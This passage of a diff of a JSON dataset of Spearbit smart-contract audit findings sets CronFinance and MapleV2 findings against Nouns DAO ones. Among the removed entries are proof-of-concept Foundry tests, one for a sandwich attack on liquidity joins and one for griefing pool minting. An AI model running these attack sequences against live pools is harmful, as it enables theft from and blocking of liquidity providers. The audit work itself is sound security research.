(proposal.canceled) { return ProposalState.Canceled; } else if (block.number <= proposal.startBlock) { return ProposalState.Pending; } else if (block.number <= proposal.endBlock) { return ProposalState.Active; } else if (proposal.forVotes <= proposal.againstVotes || proposal.forVotes <
quorumVotes(proposal.id)) { return ProposalState.Defeated; } else if (proposal.eta == 0) { return ProposalState.Succeeded; } else if (proposal.executed) { return ProposalState.Executed; >> } else if (block.timestamp >= proposal.eta + timelock.GRACE_PERIOD()) { return ProposalState.Expired; The NounsDAOV3Proposals:stateInternal() function: function stateInternal(NounsDAOStorageV3.StorageV3 storage ds, uint256 proposalId) internal view returns (NounsDAOStorageV3.ProposalState) { require(ds.proposalCount >= proposalId, 'NounsDAO::state: invalid proposal id'); NounsDAOStorageV3.Proposal storage proposal = ds._proposals[proposalId]; if (proposal.vetoed) { return NounsDAOStorageV3.ProposalState.Vetoed; } else if (proposal.canceled) { return NounsDAOStorageV3.ProposalState.Canceled; } else if (block.number <= proposal.updatePeriodEndBlock) { return NounsDAOStorageV3.ProposalState.Updatable; } else if (block.number <= proposal.startBlock) { return NounsDAOStorageV3.ProposalState.Pending; } else if (block.number <= proposal.endBlock) { return NounsDAOStorageV3.ProposalState.Active; } else if (block.number <= proposal.objectionPeriodEndBlock) { return NounsDAOStorageV3.ProposalState.ObjectionPeriod; } else if (isDefeated(ds, proposal)) { return NounsDAOStorageV3.ProposalState.Defeated; } else if (proposal.eta == 0) { return NounsDAOStorageV3.ProposalState.Succeeded; } else if (proposal.executed) { return NounsDAOStorageV3.ProposalState.Executed; >> } else if (block.timestamp >= proposal.eta + getProposalTimelock(ds, proposal).GRACE_PERIOD()) { return NounsDAOStorageV3.ProposalState.Expired; The NounsDAOLogicV1Fork:state() function: function state(uint256 proposalId) public view returns (ProposalState) { require(proposalCount >= proposalId, 'NounsDAO::state: invalid proposal id'); Proposal storage proposal = _proposals[proposalId]; if (proposal.canceled) { return ProposalState.Canceled; } else if (block.number <= proposal.startBlock) { return ProposalState.Pending; } else if (block.number <= proposal.endBlock) { return ProposalState.Active; } else if (proposal.forVotes <= proposal.againstVotes || proposal.forVotes < proposal.quorumVotes) { return ProposalState.Defeated; } else if (proposal.eta == 0) { return ProposalState.Succeeded; } else if (proposal.executed) { return ProposalState.Executed; >> } else if (block.timestamp >= proposal.eta + timelock.GRACE_PERIOD()) { return ProposalState.Expired; Impact: Since both timelocks require the sender to be admin, the valid proposal will be blocked from execution and forced to be expired when the execution call happens at time proposal.eta + getProposalTimelock(ds, proposal).GRACE_PERIOD(). The probability of this exact timestamp being reached is low, while the impact of a successful proposal being rendered invalid is by itself high. However, since there is enough time prior to that moment both for cancellation and execution, and all these actions come through a permissioned workflow, the impact is better described as medium, so per low probability and medium impact setting the severity to be low.
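One illustrative way to align the two sides (a sketch, not a recommendation from the report; alternatively the DAO state functions could use a strict > instead) is to make the executor treat the boundary timestamp as stale as well, e.g.

require(
    getBlockTimestamp() < eta + GRACE_PERIOD, // strict comparison matches the DAO's Expired state
    'NounsDAOExecutor::executeTransaction: Transaction is stale.'
);

so that the executable window and the Expired state never overlap.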
45", "labels": [ "Spearbit", - "MapleV2.pd", - "Severity: Informational" + "Nouns", + "Severity: Low Risk" ] }, { - "title": "Typos / Incorrect documentation", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", - "body": "The code and comments contain typos or are sometimes incorrect.", + "title": "A malicious DAO can increase the odds of proposal defeat by setting a very high value of last- MinuteWindowInBlocks", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "The goal of objection-only period, as documented, is to protect the DAO from executing proposals, that the majority would not want to execute. However, a malicious majority can abuse this feature by setting a very high value of lastMinuteWindowInBlocks (setter does not enforce max threshold), i.e. something very close to the voting period, to increase the probability of triggering objection-only period. If votingPeriod = 2 weeks and a governance proposal somehow passed to set lastMin- Example scenario: uteWindowInBlocks to a value very close to 100800 blocks i.e. ~2 weeks, then every proposal may end up with an objection-only period. Impact: Every proposal may end up with an objection-only period which may not be required/expected. Low likelihood + Low impact = Low severity. 46", "labels": [ "Spearbit", - "MapleV2.pd", - "Severity: Informational" + "Nouns", + "Severity: Low Risk" ] }, { - "title": "Balancer Read-Only Reentrancy Vulnerability (Changes from dev team added to audit.)", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", - "body": "Balancer's read-only reentrancy vulnerability potentially effects the following Cron-Fi TWAMM func- tions: getVirtualReserves getVirtualPriceOracle executeVirtualOrdersToBlock A mitigation was provided by the Balancer team that uses a minimum amount of gas to trigger a reentrancy check. The Balancer vulnerability is discussed in greater detail here: reentrancy-vulnerability-scope-expanded/4345", + "title": "Use custom errors instead of revert strings and remove pre-existing unused custom errors", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "String errors are added to the bytecode which make deployment cost more expenseive. It is also difficult to use dynamic information in them. Custom errors are more convenient and gas-efficient. There are several cases across the codebase where long string errors are still used over custom errors. As an example, in NounsDAOLogicV1Fork.sol#L680, the check reverts with a string: require(msg.sender == admin, 'NounsDAO::_setQuorumVotesBPS: admin only'); In this case, the AdminOnly() custom error can be used here to save gas. This also occur in other parts of this contract as well as the codebase. Also, some custom errors were defined but not used. 
See NounTokenFork.sol#L40, NounTokenFork.sol#L43", "labels": [ "Spearbit", - "CronFinance", - "Severity: High Risk" + "Nouns", + "Severity: Gas Optimization" ] }, { - "title": "Overpayment of one side of LP Pair onJoinPool due to sandwich or user error", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", - "body": "Only one of the two incoming tokens are used to determine the amount of pool tokens minted (amountLP) on join amountLP = Math.min( _token0InU112.mul(supplyLP).divDown(_token0ReserveU112), _token1InU112.mul(supplyLP).divDown(_token1ReserveU112) ); In the event the price moves between the time a minter sends their transaction and when it is included in a block, they may overpay for one of _token0InU112 or _token1InU112. This can occur due to user error, or due to being sandwiched. Concrete example: pragma solidity ^0.7.0; pragma experimental ABIEncoderV2; import \"forge-std/Test.sol\"; import \"../HelperContract.sol\"; import { C } from \"../../Constants.sol\"; import { ExecVirtualOrdersMem } from \"../../Structs.sol\"; contract JoinSandwich is HelperContract { uint256 WAD = 10**18; function testManualJoinSandwich() public { 5 address userA = address(this); address userB = vm.addr(1323); // Add some base liquidity from the future attacker. addLiquidity(pool, userA, userA, 10**7 * WAD, 10**7 * WAD, 0); assertEq(CronV1Pool(pool).balanceOf(userA), 10**7 * WAD - C.MINIMUM_LIQUIDITY); // Give userB some tokens to LP with. token0.transfer(userB, 1_000_000 * WAD); token1.transfer(userB, 1_000_000 * WAD); addLiquidity(pool, userB, userB, 10**6 * WAD, 10**6 * WAD, 0); assertEq(CronV1Pool(pool).balanceOf(userB), 10**6 * WAD); exit(10**6 * WAD, ICronV1Pool.ExitType(0), pool, userB); assertEq(CronV1Pool(pool).balanceOf(userB), 0); // Full amounts are returned b/c the exit penalty has been removed (as is being done anyway). assertEq(token0.balanceOf(userB), 1_000_000 * WAD); assertEq(token1.balanceOf(userB), 1_000_000 * WAD); // Now we'll do the same thing, simulating a sandwich from userA. uint256 swapProceeds = swapPoolAddr(5 * 10**6 * WAD, /* unused */ 0, ICronV1Pool.SwapType(0), address(token0), pool, ,! userA); // Original tx from userB is sandwiched now... addLiquidity(pool, userB, userB, 10**6 * WAD, 10**6 * WAD, 0); // Sell back what was gained from the first swap. swapProceeds = swapPoolAddr(swapProceeds, /* unused */ 0, ICronV1Pool.SwapType(0), address(token1), pool, userA); emit log_named_uint(\"swapProceeds 1 to 0\", swapProceeds); // allows seeing what userA lost to fees // Let's see what poor userB gets back of their million token0 and million token1... assertEq(token0.balanceOf(userB), 0); assertEq(token1.balanceOf(userB), 0); exit(ICronV1Pool(pool).balanceOf(userB), ICronV1Pool.ExitType(0), pool, userB); emit log_named_uint(\"userB token0 after\", token0.balanceOf(userB)); emit log_named_uint(\"userB token1 after\", token1.balanceOf(userB)); } } Output: Logs: swapProceeds 1 to 0: 4845178856516554015932796 userB token0 after: 697176321467715374004199 userB token1 after: 687499999999999999999999 1. We have a pool where the attacker is all of the liquidity (107 of each token) 2. A LP tries to deposit another 106 in equal proportions 3. The attacker uses a swap of 5 (cid:3) 106 of one of the tokens to distort the pool. They lose about 155k in the process, but the LP loses far more, nearly all of which goes to the attacker--about 615,324 (sum of the losses of the two tokens since they're equally priced in this example). 
The attacker could be a significantly smaller proportion of the pool and still find this attack profitable. They could also JIT the liquidity since the early withdrawal penalty has been removed. The attack becomes infeasible for very large pools (has to happen over multiple TXs so can't flash loan --need own capital), but is relevant in practice.", + "title": "escrowedTokensByForkId can be used to get owner of escrowed tokens", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "The state variable escrowedTokensByForkId in L58 creates a getter function that can be used to check the owner of escrowed token. This performs the same function as calling ownerOfEscrowedToken() and might be considered redundant.", "labels": [ "Spearbit", - "CronFinance", - "Severity: High Risk" + "Nouns", + "Severity: Gas Optimization" ] }, { - "title": "Loss of Long-Term Swap Proceeds Likely in Pools With Decimal or Price Imbalances", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", - "body": "This TWAMM implementation tracks the proceeds of long-term swaps efficiently via accumulated values called \"scaled proceeds\" for each token. In every order block interval (OBI), the scaled proceeds for e.g. the sale of token 0 are incremented by (quantity of token 1 purchased during the OBI) (cid:3)264= (sales rate of token 0 during the OBI) Then the proceeds of any specific long-term swap can be computed as the product of the difference between the scaled proceeds at the current block (or the expiration block of the order if filled) and the last block for which proceeds were claimed for the order and the order's sales rate, divided by 264: last := min(currentBlock, orderExpiryBlock) prev := block of last proceeds collection, or block order was placed in if this is the first withdrawal LT swap proceeds = (scaledProceedsl ast (cid:0) scaledProceedsprev ) (cid:3) (ordersalesrate)=264 The value 264 is referred to as the \"scaling factor\" and is intended to reduce precision loss in the division to determine the increment to the scaled proceeds. The addition to increment the scaled proceeds and the subtraction to compute its net change is both intentionally done with unchecked arithmetic--since only the difference matters, so long as at most one overflow occurs between claim-of-proceeds events for any given order, the computed proceeds will be correct (up to rounding errors). If two or more overflows occur, however, funds will be lost by the swapper (unclaimable and locked in the contract). Additionally, to cut down on gas costs, the scaled proceeds for the two tokens are packed into a single storage slot, so that only 128 bits are available for each value. This makes multiple overflows within the lifetime of a single order more likely. The CronFi team was aware of this at the start of the audit and specifically requested it be investigated, though they expected a maximum order length of 5 years to be sufficient to avoid the issue in practice. The scaling factor of 264 is approximately 1.8 (cid:3) 1019, close to the unit size of an 18-decimal token. 
It indeed works well if both pool tokens have similar decimals and relative prices that do not differ by too many orders of magnitude, as the quantity purchased and the sales rate will then be of similar magnitude, canceling to within a few powers of ten (2128 3.4 (cid:3) 1038, leaving around 19 orders of magnitude after accounting for the scaling factor). However, in pools with large disparities in price, decimals, or both, numerical issues are easy to encounter. The most extreme, realistic example would be a DAI-GUSD pool. DAI has 18 decimals while GUSD has only 2. We will treat the price of DAI and GUSD as equal for this analysis, as they are both stablecoins, and arbitrage of the TWAMM pool should prevent large deviations. Selling GUSD at a rate of 1000 per block, with an OBI of 64 (the stable pool order block interval in the audited commit) results in an increment of the scaled proceeds per OBI of: increment = (64 (cid:3) 1000 (cid:3) 1018) (cid:3) 264=(1000 (cid:3) 102) = 1.18 (cid:3) 1037 7 This will overflow an unsigned 128 bit integer after 29 OBIs; at 12 seconds per block, this means the first overflow occurs after 12 (cid:3) 64 (cid:3) 29 = 22272 seconds or about 6.2 hours, and thus the first double overflow (and hence irrevocable loss of proceeds if a withdrawal is not executed in time) will occur within about 12.4 hours (slightly but not meaningfully longer if the price is pushed a bit below 1:1, assuming a deep enough pool or reasonably efficient arbitrage). Since the TWAMM is intended to support swaps that take days, weeks, months, or even years to fill, without requiring constant vigilance from every long-term swapper, this is a strong violation of safety. A less extreme but more market-relevant example would be a DAI-WBTC pool. WBTC has 8 instead of 2 decimals, but it is also more than four orders of magnitude more valuable per token than DAI, making it only about 2 orders of magnitude \"safer\" than a DAI-GUSD pool. Imitating the above calculation with 20_000 DAI = 1 WBTC and selling 0.0025 WBTC (~$50) per block with a 257 block OBI yields: increment = (257 (cid:3) 50 (cid:3) 1018) (cid:3) 264=(0.0025 (cid:3) 108) = 9.48 (cid:3) 1035 OBI to overflow = ceiling(2128=(9.48 (cid:3) 1035)) = 359 time to overflow = 12 (cid:3) 257 (cid:3) 359 = 1107156 seconds = 307 hours = 12.8 days , or a little more than a day to encounter the second overflow. While less bad than the DAI-GUSD example, this is still likely of significant concern given that the CronFi team indicated these are parameters under which the TWAMM should be able to function safely and DAI-WBTC is a pair of interest for the v1 product. It is worth noting that these calculations are not directly dependent on the quantity being sold so long as the price stays roughly constant--any change in the selling rate will be compensated by a proportional change in the proceeds quantity as their ratio is determined by price. Thus the analysis depends only on relative price and relative decimals, to a good approximation--so a WBTC-DAI pool can be expected to experience an overflow roughly every two weeks at prevailing market prices, so long as the net selling rate is non-zero.", + "title": "Emit events using locally assigned variables instead of reading from storage to save on SLOAD", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "By emitting local variables over storage variables, when they have the same value, you can save gas on SLOAD. 
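A minimal sketch of the pattern, assuming a hypothetical setter shaped like the occurrences listed next:

    uint256 public votingDelay;

    event VotingDelaySet(uint256 oldVotingDelay, uint256 newVotingDelay);

    function _setVotingDelay(uint256 newVotingDelay) external {
        uint256 oldVotingDelay = votingDelay;
        votingDelay = newVotingDelay;
        // emit the local/calldata value; reading `votingDelay` back here would cost an extra SLOAD
        emit VotingDelaySet(oldVotingDelay, newVotingDelay);
    }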
Some examples include: NounsDAOLogicV1Fork.sol#L619 : - emit VotingDelaySet(oldVotingDelay, votingDelay); + emit VotingDelaySet(oldVotingDelay, newVotingDelay); NounsDAOLogicV1Fork.sol#L635 : - emit VotingPeriodSet(oldVotingPeriod, votingPeriod); + emit VotingPeriodSet(oldVotingPeriod, newVotingPeriod); NounsDAOLogicV1Fork.sol#L653 : - emit ProposalThresholdBPSSet(oldProposalThresholdBPS, proposalThresholdBPS); + emit ProposalThresholdBPSSet(oldProposalThresholdBPS, newProposalThresholdBPS); NounsDAOLogicV1Fork.sol#L670 : - emit QuorumVotesBPSSet(oldQuorumVotesBPS, quorumVotesBPS); + emit QuorumVotesBPSSet(oldQuorumVotesBPS, newQuorumVotesBPS); NounsDAOExecutorV2.sol#L104 : - emit NewDelay(delay); + emit NewDelay(delay_); NounsDAOExecutorV2.sol#L112 : - emit NewAdmin(admin); + emit NewAdmin(msg.sender); NounsDAOExecutorV2.sol#L122 : - emit NewPendingAdmin(pendingAdmin); + emit NewPendingAdmin(pendingAdmin_); NounsDAOV3Admin.sol#L284 : - emit NewPendingAdmin(oldPendingAdmin, ds.pendingAdmin); + emit NewPendingAdmin(oldPendingAdmin, address(0)); NounsDAOProxy.sol#L85 : - emit NewImplementation(oldImplementation, implementation); + emit NewImplementation(oldImplementation, implementation_);", "labels": [ "Spearbit", - "CronFinance", - "Severity: High Risk" + "Nouns", + "Severity: Gas Optimization" ] }, { - "title": "An attacker can block any address from joining the Pool and minting BLP Tokens by filling the joinEventMap mapping.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", - "body": "An attacker can block any address from minting BLP Tokens. This occurs due to the MAX_JOIN_- EVENTS limit, which is present in the JoinEventLib library. The goal for an attacker is to block a legitimate user from minting BLP Tokens, by filling the joinEventMap mapping. The attacker can fill the joinEventMap mapping by performing the following steps: The attacker mints BLP Tokens from 50 different addresses. Each address transfers the BLP Tokens, alongside the join events, to the user targeted with a call to the CronV1Pool(pool).transfer and CronV1Pool(pool).transferJoinEvent functions respectively. Those transfers should happen in different blocks. After 50 blocks (50 * 12s = 10 minutes) the attacker has blocked the legitimate user from minting _BLP Tokens_, as the maximum size of the joinEventMap mapping has been reached. 8 The impact of this vulnerability can be significant, particularly for smart contracts that allow users to earn yield by providing liquidity in third-party protocols. For example, if a governance proposal is initiated to generate yield by providing liquidity in a CronV1Pool pool, the attacker could prevent the third-party protocol from integrating with the CronV1Pool protocol. A proof-of-concept exploit demonstrating this vulnerability can be found below: function testGriefingAttack() public { console.log(\"-----------------------------\"); console.log(\"Many Users mint BLP tokens and transfer the join events to the user 111 in order to fill the array!\"); ,!
for (uint j = 1; j < 51; j++) { _addLiquidity(pool, address(j), address(j), 2_000, 2_000, 0); vm.warp(block.timestamp + 12); vm.startPrank(address(j)); //transfer the tokens CronV1Pool(pool).transfer(address(111), CronV1Pool(pool).balanceOf(address(j))); //transfer the join events to the address(111) CronV1Pool(pool).transferJoinEvent(address(111), 0 , CronV1Pool(pool).balanceOf(address(j))); vm.stopPrank(); } console.log(\"Balance of address(111) before minting LP Tokens himself\", ,! ICronV1Pool(pool).balanceOf(address(111))); //user(111) wants to enter the pool _addLiquidity(pool, address(111), address(111), 5_000, 5_000, 0); console.log(\"Join Events of user address(111): \", ICronV1Pool(pool).getJoinEvents(address(111)).length); console.log(\"Balance of address(111) after adding the liquidity: \", ICronV1Pool(pool).balanceOf(address(111))); ,! ,! }", + "title": "joinFork() violates Checks-Effects-Interactions best practice for reentrancy mitigation", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "joinFork() interacts with forkDAOTreasury in sendProRataTreasury() to send pro rata original DAO treasury for the tokens joining the fork. This interaction with the external forkDAOTreasury contract happens before the transfer of the original DAO tokens to the timelock is effected. While forkDAOTreasury is under the control of the fork DAO (outside the trust model of the original DAO) and joinFork() does not have a reentrancy guard, we do not see a potential/meaningful exploitable reentrancy here.", "labels": [ "Spearbit", - "CronFinance", - "Severity: High Risk" + "Nouns", + "Severity: Informational" ] }, { - "title": "The executeVirtualOrdersToBlock function updates the oracle with the wrong block.number", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", - "body": "The executeVirtualOrdersToBlock is external, meaning anyone can call this function to execute virtual orders. The _maxBlock parameter can be lower block.number which will make the oracle malfunction as the oracle update function _updateOracle uses the block.timestamp and assumes that the update was called with the reserves at the current block. This will make the oracle update with an incorrect value when _maxBlock can be lower than block.number.", + "title": "Rename MAX_VOTING_PERIOD and MAX_VOTING_DELAY to enhance readability.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "Given that the state variables MAX_VOTING_PERIOD (NounsDAOV3Admin.sol#L115) and MAX_VOTING_DELAY (NounsDAOV3Admin.sol#L121) are in blocks, it is more readable if the names have a _BLOCKS suffix and are set to 2 weeks / 12 as done with MAX_OBJECTION_PERIOD_BLOCKS and MAX_UPDATABLE_PERIOD_BLOCKS. The functions _setVotingDelay (L152) and _setVotingPeriod (L167) can be renamed in the same vein by adding an -InBlocks suffix similar to _setObjectionPeriodDurationInBlocks and other functions. In addition to this, constants should be named with all capital letters with underscores separating words, following the Solidity style guide.
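A sketch of the suggested rename (the 2 weeks / 12 expression follows the report's 12-second-block convention; the declarations are otherwise hypothetical):

    // before: MAX_VOTING_PERIOD, MAX_VOTING_DELAY
    uint256 public constant MAX_VOTING_PERIOD_BLOCKS = 2 weeks / 12; // 100_800 blocks
    uint256 public constant MAX_VOTING_DELAY_BLOCKS = 2 weeks / 12;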
For example, proposalMaxOperations in NounsDAOV3Proposals.sol#L138 can be renamed.", "labels": [ "Spearbit", - "CronFinance", - "Severity: High Risk" + "Nouns", + "Severity: Informational" ] }, { - "title": "The _join function does not check if the recipient is address(0)", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", - "body": "As stated within the Balancer's PoolBalances.sol // The Vault ignores the `recipient` in joins and the `sender` in exits: it is up to the Pool to keep track of ,! // their participation. The recipient is not checked if it's the address(0), that should happen within the pool implementation. Within the Cron implementation, this check is missing which can cause losses of LPs if the recipient is sent as address(0). This can have a high impact if a 3rd party integration happens with the Cron pool and the \"joiner\" is mistakenly sending an address(0). This becomes more dangerous if the 3rd party is a smart contract implementation that connects with the Cron pool, as the default value for an address is the address(0), so the probability of this issue occurring increases.", + "title": "External function is used instead of internal equivalent across NounsDAOV3Proposals logic", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "The public view state(ds, proposalId) is used instead of the fully equivalent internal stateInternal(ds, proposalId) in several occurrences of the NounsDAOV3Proposals logic. For example, in NounsDAOV3Proposals:updateProposalBySigs, state(ds, proposalId) is used instead of the stateInternal function: if (state(ds, proposalId) != NounsDAOStorageV3.ProposalState.Updatable) revert CanOnlyEditUpdatableProposals();", "labels": [ "Spearbit", - "CronFinance", - "Severity: Low Risk" + "Nouns", + "Severity: Informational" ] }, { - "title": "Canonical token pairs can be griefed by deploying new pools with malicious admins", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", - "body": "function create( address _token0, address _token1, string memory _name, string memory _symbol, uint256 _poolType, address _pauser ) external returns (address) { CronV1Pool.PoolType poolType = CronV1Pool.PoolType(_poolType); requireErrCode(_token0 != _token1, CronErrors.IDENTICAL_TOKEN_ADDRESSES); (address token0, address token1) = _token0 < _token1 ? (_token0, _token1) : (_token1, _token0); requireErrCode(token0 != address(0), CronErrors.ZERO_TOKEN_ADDRESSES); requireErrCode(getPool[token0][token1][_poolType] == address(0), CronErrors.EXISTING_POOL); address pool = address( new CronV1Pool(IERC20(_token0), IERC20(_token1), getVault(), _name, _symbol, poolType, ,! address(this), _pauser) ); //... Anyone can permissionlessly deploy a pool, with it then becoming the canonical pool for that pair of tokens. An attacker is able to pass a malicious _pauser the twamm pool, preventing the creation of a legitimate pool of the same type and tokens. This results in race conditions between altruistic and malicious pool deployers to set the admin for every token pair.
10 Malicious actors may grief the protocol by attempting to deploy token pairs with and exploiting the admin address, either deploying the pool in a paused state, effectively disabling trading for long-term swaps with the pool, pausing the pool at an unknown point in the future, setting fee and holding penalty parameters to inappropriate values, or setting illegitimate arbitrage partners and lists. This requires the factory owner to remove the admin of each pool individually and to set a new admin address, fee parameters, holding periods, pause state, and arbitrage partners in order to recover each pool to a usable condition if the griefing is successful.", + "title": "Proposals created through proposeBySigs() cannot be executed on TimelockV1", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "Currently, proposals created through the proposeBySigs() function cannot be executed on TimelockV1. This could potentially limit the flexibility of creating different types of proposals. It may be advantageous to have a parameter added to the proposeBySigs() function, allowing the proposer to decide whether the proposal should be executed on TimelockV1 or not. There's a design decision to be made regarding whether this value should be incorporated as part of the signers' signature, or simply left up to the proposer to determine if execution should happen on TimelockV1 or not.", "labels": [ "Spearbit", - "CronFinance", - "Severity: Low Risk" + "Nouns", + "Severity: Informational" ] }, { - "title": "Refund Computation in _withdrawLongTermSwap Contains A Risky Underflow", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", - "body": "Nothing prevents lastVirtualOrderBlock from advancing beyond the expiry of any given long-term swap, so the unchecked subtraction here is unsafe and can underflow. Since the resulting refund value will be extremely large due to the limited number of blocks that can elapse and the typical prices and decimals of tokens, the practical consequence will be a revert due to exceeding the pool and order balances. However, this could be used to steal funds if the value could be maliciously tuned, for example via another hypothetical bug that allowed the last virtual order block or the sales rate of an order to be manipulated to an arbitrary value.", + "title": "escrowToFork() can be frontrun to prevent users from joining the fork during the escrow period", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "escrowToFork() could be frontrun by another user and made to revert by either: 1. Frontrunning with another escrowToFork() that reaches the fork threshold + executeFork(). 2. If the fork threshold was already reached, frontrunning with executeFork().
This forces the escrowing user to join the fork only during the forking period.", "labels": [ "Spearbit", - "CronFinance", - "Severity: Low Risk" + "Nouns", + "Severity: Informational" ] }, { - "title": "Function transferJoinEvent Permits Transfer-to-Self", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", - "body": "Though the error code indicates the opposite intent, this check will permit transfer-to-self (|| used instead of &&).", + "title": "Fork spec says Nouns are escrowed during the fork active period", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "Fork-Spec says: \"During the forking period additional forking Nouns are also sent to the escrow contract; the motivation is to have a clean separation between fork-related Nouns and Nouns owned by the DAO for other reasons.\" However, the implementation sends such Nouns to the original DAO treasury.", "labels": [ "Spearbit", - "CronFinance", - "Severity: Low Risk" + "Nouns", + "Severity: Informational" ] }, { - "title": "One-step owner change for factory owner", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", - "body": "The factory owner can be changed with a single transaction. As the factory owner is critical to managing the pool fees and other settings an incorrect address being set as the owner may result in unintended behaviors.", + "title": "Known issues from previous versions/audit", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "Below are some of the known issues from previous versions as reported by the protocol team, documented in the audit report, and recorded here verbatim for reporting purposes. Note: All issues reported earlier and not fixed in current version(s) of audit scope are assumed to be acknowledged without fixing. NounsToken delegateBySigs allows delegating to address zero We've fixed this issue in the fork token contract, but cannot fix it in the original NounsToken because the contract isn't upgradeable. Voting gas refund can be abused We're aware of different ways of abusing this function: A token holder could delegate their Nouns to a contract and vote on multiple proposals in a loop, such that the tx gas overhead is amortized across all votes, while the refund function assumes each vote has the full overhead to bear; this could result in token holders profiting from gas refunds. A token holder could grief the DAO by voting with very long reason strings, in order to drain the refund balance faster. We find these issues low risk and unlikely given the small size of the community, and the low ETH balance the governor contract has to spend on refunds. Should we see such abusive activity, we might reconsider this feature. Nouns transfers will stop working when block number hits uint32 max value We're aware of this issue. It means the Nouns token will stop functioning a long long long time from now :) AuctionHouse has an open gas griefing vector Bidder Alice can bid from a smart contract that returns a large byte array when receiving ETH. Then if Bob outbids Alice, in his bid tx AuctionHouse refunds Alice, and the large return value causes a gas cost spike for Bob. See more details here. We're planning to fix this in the next AuctionHouse version, its launch date is unknown at this point.
Using error strings instead of custom errors In all new code we're using custom errors. In code that's forked from previous versions we optimized for the smallest diff possible, and so left error strings untouched.", "labels": [ "Spearbit", - "CronFinance", - "Severity: Low Risk" + "Nouns", + "Severity: Informational" ] }, { - "title": "Factory owner may front run large orders in order to extract fees", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", - "body": "The factory owner may be able to front-run large trades in order to extract more fees if compromised or becomes malicious in one way or another. Similarly, pausing may also allow for skipping the execution of virtual orders before exiting.", + "title": "When a minority forks, the majority can follow", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "This is a known issue as documented by the protocol team and is being recorded here verbatim for reporting purposes. For example, a malicious majority can vote For a proposal to drain the treasury, forcing others to fork; the majority can then join the fork with many of their tokens, benefiting from the passing proposal on the original DAO, while continuing to attack the minority in their new fork DAO, forcing them to quit the fork DAO. This is a well-known flaw of the current fork design, something we've chosen to go live with for the sake of shipping something the DAO has asked for urgently.", "labels": [ "Spearbit", - "CronFinance", - "Severity: Low Risk" + "Nouns", + "Severity: Informational" ] }, { - "title": "Join Events must be explicitly transfered to recipient after transfering Balancer Pool Tokens in order to realize the full value of the tokens", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", - "body": "Any user receiving LP tokens transferred to them must be explicitly transferred with a join event in order to redeem the full value of the LP tokens on exit, otherwise the address transferred to will automatically get the holding penalty when they try to exit the pool. Unless a protocol specifically implements transferJoinEvent function compatibility all LP tokens going through that protocol will be worth a fraction of their true value even after the holding period has elapsed.", + "title": "The original DAO can temporarily brick a fork DAO's token minting", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "This is a known issue as documented by the protocol team and is being recorded here verbatim for reporting purposes. We've decided in this version to deploy fork DAOs such that fork tokens reuse the same descriptor contract as the original DAO's token descriptor. Our motivations are minimizing lines of code and the gas cost of deploying a fork. This design poses a risk on fork tokens: the original DAO can update the descriptor to use a new art contract that always reverts, which would then lead to the fork token's mint function always reverting. The solution would be for the fork DAO to execute a proposal that deploys and sets a new descriptor to its token, which would use a valid art contract, allowing minting to resume.
The fork DAO is guaranteed to be able to propose and execute such a proposal, because the function where Nouners claim their fork tokens does not use the descriptor, and so is not vulnerable to this attack.", "labels": [ "Spearbit", - "CronFinance", - "Severity: Low Risk" + "Nouns", + "Severity: Informational" ] }, { - "title": "Order Block Intervals(OBI) and Max Intervals are calculated with 14 second instead of 12 second block times", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", - "body": "The CronV1Pool contract calculates both the Order Block Intervals (OBI) and the Max Intervals of the Stable/Liquid/Volatile pairs with 14 second block times. However, after the merge, 12 second block time is enforced by the Beacon Chain.", + "title": "Unused events, missing events and unindexed event parameters in contracts", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "Some contracts have missing or unused events, as well as event parameters that are unindexed. As examples: 1. Unused events: INounsTokenFork.sol#L29: event NoundersDAOUpdated(address noundersDAO); 2. Missing events: 